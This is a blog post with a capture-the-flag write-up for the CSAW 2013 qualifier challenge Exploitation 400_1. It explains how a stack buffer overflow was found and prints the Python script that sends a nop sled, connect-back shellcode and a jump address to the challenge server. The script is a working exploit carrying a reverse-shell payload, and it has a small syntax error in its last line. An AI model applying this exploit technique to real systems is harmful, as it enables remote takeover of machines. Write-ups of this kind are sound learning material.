Tuesday, September 24, 2013

CSAW CTF Quals: Exploitation 400_1

The dissassembly for this program tended to be more confusing than helpful. Fuzzing the program for a brief amount of time, we found the capability write over eip with an input of 417 bytes. Luckily enough, esp pointed to the middle of the text that we sent in. So, most our input contained a nop sled to the reverse shell and an address to jump to esp. The winning script follows:
import socket
import struct

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("128.238.66.221", 5930))
f = open("connectback_shell",'r')
shellcode = f.read()
f.close()
print s.recv(1024)
s.sendall("\x90"*(417-len(shellcode)-4) + shellcode + "\x90"*4 + struct.pack("<I", 0x080c6b1f) )
print s.recv(1024))
Comments welcome and questions feel free to ask!

--Imp3rial

2 comments:

  1. I guess I could explain on that a bit more. The code showed that the buffer for the input was only about 120ish bytes. Using this knowledge, I used a unique string generator to figure how many bytes in the ESP was being written over. From there I tested a couple different length string until I could successfully control EIP. From there it is a pretty standard exploit. Let me know if you have any more question!

    --Imp3rial

    ReplyDelete